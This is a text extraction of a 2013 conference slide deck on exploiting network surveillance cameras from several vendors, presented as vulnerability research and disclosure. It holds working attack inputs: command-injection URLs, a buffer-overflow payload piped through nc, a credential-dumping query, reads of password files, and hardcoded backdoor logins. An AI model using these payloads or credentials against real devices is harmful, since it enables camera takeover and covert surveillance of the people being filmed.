US 13 Heffner Exploiting Network Surveillance Cameras Like a Hollywood Hacker Slides

Preview:

Click to see full reader

DESCRIPTION

Surveillance

Citation preview

Craig Heffner, Tactical Network Solutions

Exploiting Surveillance CamerasLike a Hollywood Hacker

Friday, July 12, 2013

Introduction

✤ Embedded vulnerability analyst for Tactical Network Solutions

✤ Embedded Device Exploitation course instructor

✤ I do wireless stuff from time to time too

Friday, July 12, 2013

Objectives

✤ Analyze surveillance camera security

✤ Drop some 0-days

✤ Demo a true Hollywood-style hack

Friday, July 12, 2013

D-Link DCS-7410

Friday, July 12, 2013

Lighttpd Access Rules

Friday, July 12, 2013

What Isn’t in the Access Rules?

Friday, July 12, 2013

rtpd.cgi

Friday, July 12, 2013

eval($QUERY_STRING)

✤ http://192.168.1.101/cgi-bin/rtpd.cgi?action=stop

Friday, July 12, 2013

http://192.168.1.101/cgi-bin/rtpd.cgi?reboot
http://192.168.1.101/cgi-bin/rtpd.cgi?reboot

Friday, July 12, 2013

The Exploit (No, Seriously...)

✤ http://192.168.1.101/cgi-bin/rtpd.cgi?reboot

Friday, July 12, 2013

http://192.168.1.101/cgi-bin/rtpd.cgi?reboot
http://192.168.1.101/cgi-bin/rtpd.cgi?reboot

Grabing Admin Creds

✤ /cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

Friday, July 12, 2013

pwned.

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Shodan Dork

Friday, July 12, 2013

CVE-2013-1599

✤ Disclosed by Core Security after talk submission

Friday, July 12, 2013

WVC80N

Friday, July 12, 2013

/img/snapshot.cgi

Friday, July 12, 2013

/adm/ez.cgi

Friday, July 12, 2013

strcpy(dest, QUERY_STRING)

Friday, July 12, 2013

Friday, July 12, 2013

/img/snapshot.cgi?A*152

Friday, July 12, 2013

Where to Return?

Friday, July 12, 2013

Return to sub_9B88

✤ PAYLOAD=$(perl -e 'print "A"x148; print "\x88\x9B"')

✤ echo -ne "GET /img/snapshot.cgi?$PAYLOAD HTTP/1.0\r\n\r\n" | nc 192.168.1.100 80

Friday, July 12, 2013

When Base64 Isn’t Base64

Friday, July 12, 2013

BEST. USER GUIDE. EVER.

Friday, July 12, 2013

Decoded Config

Friday, July 12, 2013

pwned.

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Shodan Dorks

Friday, July 12, 2013

Cisco PVC-2300

Friday, July 12, 2013

.htpasswd Protection

Friday, July 12, 2013

/usr/local/www/oamp

Friday, July 12, 2013

cgi_get_value(var_18, “action”)

Friday, July 12, 2013

Valid Actions

✤ downloadConfigurationFile

✤ uploadConfigurationFile

✤ updateFirmware

✤ loadFirmware

✤ ...

Friday, July 12, 2013

getenv(“SESSIONID”)

Friday, July 12, 2013

strcasecmp(“login”, action)

Friday, July 12, 2013

cgi_get_value(var_10, “user”)

Friday, July 12, 2013

cgi_get_value(var_10, “password”)

Friday, July 12, 2013

PRO_GetStr(“OAMP”, “l1_usr”, ...)

Friday, July 12, 2013

PRO_GetStr(“OAMP”, “l1_pwd”, ...)

Friday, July 12, 2013

strcmp(user, l1_usr)

Friday, July 12, 2013

strcmp(password, l1_pwd)

Friday, July 12, 2013

Where are l1_usr and l1_pwd?

Friday, July 12, 2013

Friday, July 12, 2013

Getting a Session ID

✤ $ wget http://192.168.1.101/oamp/System.xml?action=login&user=L1_admin&password=L1_51

Friday, July 12, 2013

http://192.168.1.101/oamp/DeviceBasicInfo.xml?action=login&user=
http://192.168.1.101/oamp/DeviceBasicInfo.xml?action=login&user=
http://192.168.1.101/oamp/DeviceBasicInfo.xml?action=login&user=
http://192.168.1.101/oamp/DeviceBasicInfo.xml?action=login&user=

downloadConfigurationFile

✤ $ wget --header=”sessionID: 57592414” \ http://192.168.1.101/oamp/System.xml?\ action=downloadConfigurationFile

Friday, July 12, 2013

http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile

When Base64 Isn’t Base64

Friday, July 12, 2013

Non-Standard Key String

Friday, July 12, 2013

Decoded Config

Friday, July 12, 2013

pwned.

Friday, July 12, 2013

action=loadFirmware

Friday, July 12, 2013

Friday, July 12, 2013

pwned x2

✤ $ wget --header=”sessionID: 57592414” \ http://192.168.1.101/oamp/System.xml?\ action=loadFirmware&url=https://127.0.0.1:65534/;reboot;

Friday, July 12, 2013

http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
http://192.168.1.101/oamp/System.xml?action=downloadConfigurationFile
https://127.0.0.1:65534/;reboot
https://127.0.0.1:65534/;reboot

Also Affected

Friday, July 12, 2013

Shodan Dork

Friday, July 12, 2013

IQInvision IQ832N

Friday, July 12, 2013

Default Unauth Video Feed

Friday, July 12, 2013

Admin Area Password Protected

Friday, July 12, 2013

oidtable.cgi

Friday, July 12, 2013

strstr(QUERY_STRING, “grep=”)

Friday, July 12, 2013

if(strlen(grep) < 32)

Friday, July 12, 2013

sprintf(“grep -i ‘%s’...”)

Friday, July 12, 2013

popen(“grep -i ‘%s’...”)

Friday, July 12, 2013

Friday, July 12, 2013

Command Injection

✤ http://192.168.1.101/oidtable.cgi?grep='$IFS/tmp/a;ps;'

✤ grep -i ‘’ /tmp/a;ps;’’ /tmp/oidtable.html

Friday, July 12, 2013

http://192.168.1.101/oidtable.cgi?grep='$IFS/etc/privpasswd;'
http://192.168.1.101/oidtable.cgi?grep='$IFS/etc/privpasswd;'

Retrieving Arbitrary Files

✤ http://192.168.1.101/oidtable.cgi?grep='$IFS/etc/privpasswd;'

✤ grep -i ‘’ /etc/privpasswd;’’ /tmp/oidtable.html

Friday, July 12, 2013

http://192.168.1.101/oidtable.cgi?grep='$IFS/etc/privpasswd;'
http://192.168.1.101/oidtable.cgi?grep='$IFS/etc/privpasswd;'

Encrypted Admin Password

Friday, July 12, 2013

Decrypted Admin Password

Friday, July 12, 2013

pwned.

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Shodan Dork

✤ jht

Friday, July 12, 2013

3SVision N5071

Friday, July 12, 2013

Restricted Firmware Download

Friday, July 12, 2013

Friday, July 12, 2013

Use the Source, Luke

Friday, July 12, 2013

Literacy FTW

Friday, July 12, 2013

/home/3s/bin

Friday, July 12, 2013

pwdgrp_get_userinfo

Friday, July 12, 2013

Friday, July 12, 2013

Hardest. Exploit. Ever.

Friday, July 12, 2013

pwned.

Friday, July 12, 2013

pwned.

Friday, July 12, 2013

pwned.

Friday, July 12, 2013

do_records

Friday, July 12, 2013

records.cgi?action=remove

Friday, July 12, 2013

strstr(cgi_parameters, “&filename”)

Friday, July 12, 2013

system(“rm /mnt/sd/media/%s”)

Friday, July 12, 2013

pwned x2

✤ $ wget \ --user=3sadmin --password=27988303 \ 'http://192.168.1.101/records.cgi?\ action=remove&storage=sd&filename=`reboot`'

Friday, July 12, 2013

http://livepage.apple.com/
http://livepage.apple.com/
http://livepage.apple.com/
http://livepage.apple.com/

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Also Affected

Friday, July 12, 2013

Shodan Dorks

Friday, July 12, 2013

So Basically...

✤ I’m in your network.

✤ I can see you.

✤ And I’m root.

Friday, July 12, 2013

Let’s Turn This...

Friday, July 12, 2013

...Into This.

Friday, July 12, 2013

Trendnet TV-IP410WN

Friday, July 12, 2013

Has a Backdoor Account

productmaker:ftvsbannedcode

Friday, July 12, 2013

That Can Access These Files

Friday, July 12, 2013

Which Have Command Injection

Friday, July 12, 2013

That Can Be Trivially Exploited

✤ http://192.168.1.101/cgi/maker/ptcmd.cgi?cmd=;ls

✤ system(“/sbin/ptctrl ;ls”)

Friday, July 12, 2013

http://192.168.1.101/cgi/maker/ptcmd.cgi?cmd=;ls
http://192.168.1.101/cgi/maker/ptcmd.cgi?cmd=;ls

By Anyone, Anywhere

Friday, July 12, 2013

What’s Old is New Again

✤ Vulnerability first published in 2011

✤ Report did not mention any specific devices

✤ Everyone ignored it...

Friday, July 12, 2013

Shodan Dork

Friday, July 12, 2013

Admin’s Video Feed

Friday, July 12, 2013

mjpg.cgi

Friday, July 12, 2013

Killing mjpg.cgi

✤ http://192.168.1.101/cgi/maker/ptcmd.cgi?cmd=;kill$IFS-9$IFS379

Friday, July 12, 2013

http://192.168.1.101/cgi/maker/ptcmd.cgi?cmd=;ls
http://192.168.1.101/cgi/maker/ptcmd.cgi?cmd=;ls

Replacing mjpg.cgi

#!/bin/sh

echo -ne “HTTP/1.1 200 OK\r\n Content-Type: image/jpeg\r\n\r\n”

cat /tmp/static_img.jpg

Friday, July 12, 2013

Admin’s Video Feed

Friday, July 12, 2013

What’s Really Happening

Friday, July 12, 2013

Demo Time!

Friday, July 12, 2013

Closing Thoughts

✤ Lots more bugs where these came from

✤ Cameras reveal their model number in the login prompt

✤ All exploits developed exclusively from firmware update files

✤ Binwalk + IDA + Qemu == WIN.

Friday, July 12, 2013

Contact

✤ cheffner@tacnetsol.com

✤ http://www.tacnetsol.com

✤ @devttys0

✤ http://www.devttys0.com/blog

Friday, July 12, 2013

mailto:cheffner@tacnetsol.com
mailto:cheffner@tacnetsol.com

Recommended

Hacker Intelligence Summary Report – Monitoring Hacker Forums · Hacker Intelligence Initiative, Monthly Trend Report 5. Commerce – A key function of hacker forums is commerce
Documents
Stan Heffner- Key Note Speaker-Basa bfk-06292012
Education
HISTÓRIA DA CENSURA CINEMATOGRÁFICA NO BRASIL HERNANI HEFFNER
Documents
CERTIFIED ETHICAL HACKER Ethical Hacker Certified Ethical Hacker v10: Course Description The Certified Ethical Hacker program is a trusted and respected ethical hacking training Program
Documents
Wireless Threats and Practical Exploits · 9/2007: Pentagon Federal Credit Union, Citibank Hacker "Max Vision" (Max Butler) was indicted in 2001 for exploiting hundreds of military
Documents
Heffner Wetland Facility Roof Garden - KB Home
Documents
Hacker & Cracker Ma. Isabel Reyes Sánchez. CONTENIDO HACKER HACKER - DEFINICION -ORIGENES -ACTIVISMO & ETICA -SIMBOLOS & PERSONAJES DESTACADOS CRACKER
Documents
The Great Depression Ryan Braunsberg, Jake Heffner, and David Hawley
Documents
How to Hack Millions of Routers - DEF CON · PDF fileHow to Hack Millions of Routers Author: Craig Heffner Keywords: Defcon, DEF CON, Hacker,Security Conference, Presentations,Technology,Phreaking,Lockpicking,hackers
Documents
Ohio Ethics Form - Heffner
Documents
Hacker Autogyro „Calidus 50E“ - · PDF fileAnleitung / Manual Hacker Autogyro „alidus © 2013 Hacker Motor GmbH Seite / page 1 Hacker Autogyro „Calidus 50E“ Montage- und
Documents
November 9, 2013 Heffner Alumni House 10 am AIGC Meeting
Documents
4. Heffner Chest 1997
Documents
Randy Heffner Vice President Forrester Research
Documents
Exploiting Network Printersnds.rub.de/media/ei/arbeiten/2017/01/13/exploiting-printers.pdf · Remember the old hacker days when Angelina Jolie and Jonny Miller went dumpster diving
Documents
DEFCON 18 Heffner Routers WP
Documents
Grayson Heffner - Smart Grids and Smart Customer Policies for Asia
Documents
BlackHat USA 2010 Heffner How to Hack Millions of Routers Slides
Documents
Sound localization and its relation to vision in large and small new-world bats G. Koay, H.E. Heffner, R.S. Heffner Dept. of Psychology University of Toledo
Documents
Gail Gunst Heffner, Clarence W. Joldersma, David … · Gail Gunst Heffner, Clarence W. Joldersma, David Warners, Randy Van Dragt Calvin College, Grand Rapids, Michigan, USA 9/24/2009
Documents